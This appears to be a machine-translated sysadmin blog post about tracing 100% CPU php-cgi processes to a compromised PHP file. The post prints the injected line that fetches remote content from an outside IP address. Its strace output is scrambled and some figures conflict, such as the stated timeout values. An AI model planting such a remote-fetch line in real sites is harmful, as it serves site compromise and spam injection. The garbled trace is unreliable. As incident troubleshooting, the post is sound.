English | 简体中文 | 繁體中文 | Русский язык | Français | Español | Português | Deutsch | 日本語 | 한국어 | Italiano | بالعربية

Linux php-cgi.exe CPU usage 100% troubleshooting journey

Let's talk about the architecture of our website. Since the website traffic is not very high at present, but as the company's website needs to be promoted recently, the website has been switched from a single machine to a front-end using nginx for load balancing, driving two web servers. All web pages and static files are accessed through shared calls via NFS. The NFS service is installed on one of the web servers, and the backend uses the master-slave mode of mysql, which is a very typical architecture.

Switching to this architecture only2On that day, I received a nagios alarm, the alarm information showed that one web server had a high load, so I logged into the server using SecureCRT, checked it with the top command, and found several php-The cgi process occupies a large amount of CPU, as follows:

13889 www    25  0 228m 14m 9344 S 100.4 0.1 14:51.22 php-cgi
13882 www    25  0 227m 13m 9284 S 100.1 0.1 10:53.18 php-cgi
13924 www    25  0 227m 9936 5732 S 100.1 0.1 23:20.80 php-cgi
13927 www    25  0 226m 5228 2064 R 100.1 0.0 24:44.24 php-cgi
13827 www    25  0 228m 15m 10m R 99.7 0.1 12:57.60 php-cgi
13900 www    25  0 228m 19m 13m R 99.7 0.1  9:03.09 php-cgi

From the above screenshot, we can see that these php-The cgi process not only occupies a large amount of CPU, but also runs for a very long time, originally php-The cgi process received a request and ran quickly, but why haven't these few been released after running for so long? So we used the command ls -l /proc/13827/fd/Here are the results of checking what this long-running process is doing:

lrwx------ 1 www www 64 Dec 11 12:03 0 -> socket:[68444030]
l-wx------ 1 www www 64 Dec 11 12:03 1 -> pipe:[68444057]
l-wx------ 1 www www 64 Dec 11 12:03 2 -> pipe:[68444058]
lrwx------ 1 www www 64 Dec 11 12:03 3 -> socket:[68468225]
lrwx------ 1 www www 64 Dec 11 12:03 4 -> socket:[68469788]
lrwx------ 1 www www 64 Dec 11 12:03 5 -> socket:[68457928]

Found no open file or write operations, this process is not doing much, which is quite strange. Then we use the strace command to track what this process is doing.

strace -p 13827
, 0)4, 0) 1, 0) = 0 (Timeout)
select(5, [4], [4], [], {15, 0)) = ' 1 }]4(out [15], left {
, 0)4, 0) 1, 0) = 0 (Timeout)
select(5, [4], [4], [], {15, 0)) = ' 1 }]4(out [15], left {
, 0)4, 0) 1, 0) = 0 (Timeout)
select(5, [4], [4], [], {15, 0)) = ' 1 }]4(out [15], left {
, 0)4, 0) 1, 0) = 0 (Timeout)
select(5, [4], [4], [], {15, 0)) = ' 1 }]4(out [15], left {
, 0)4, 0) 1, 0) = 0 (Timeout)
select(5, [4], [4], [], {15, 0)) = ' 1 }]4(out [15], left {
, 0)4, 0) 1, 0) = 0 (Timeout)
select(5, [4], [4], [], {15, 0)) = ' 1 }]4(out [15], left {
, 0)4, 0) 1, events=POLLIN}],

, 0) = 0 (Timeout) …….-It can be seen that this process keeps timing out, but why does it timeout? It seems that we need to check php-The timeout setting of fpm.conf is 0, which means not setting the timeout time. So first look for problems in the cgi log, since the original php-The timeout setting of fpm.conf is set to5s, then exceed5s php-The requests of cgi will be recorded in the slow log of php, set as follows:

3s
logs/slow.log

The setting is complete, use the command/usr/local/php/sbin/php-fpm restart restart php-fpm, after a while check the content of slow.log and find many contents like the following:

script_filename = /data/htdocs/bbs.hrloo.com/apl.php
[0x00007fffb060fd70] file_get_contents() /data/htdocs/bbs.hrloo.com/apl.php:10

View/data/htdocs/bbs.hrloo.com/The content of the 10th line of apl.php is as follows:

echo file_get_contents('http://121.10.108.227:86/yh.asp');

I searched online and found an introduction to the php function. When the website response is slow, the CPU usage will be very high and it will keep stuck without timing out. Take a look at this link, visit it, and it points to a novel website that was attacked and embedded. After restoring this file, it returned to normal. It's strange that the web server that installed NFS did not have this problem. It seems that the site was slow to begin with, and it was even slower through NFS, so this fault occurred. Thank this fault, only to find this serious problem.

The problem has been fixed, but the problem is far from solved. The key is to find out how the file was modified to prevent similar accidents from happening again. It seems there is still a lot to do. Haha!

You may also like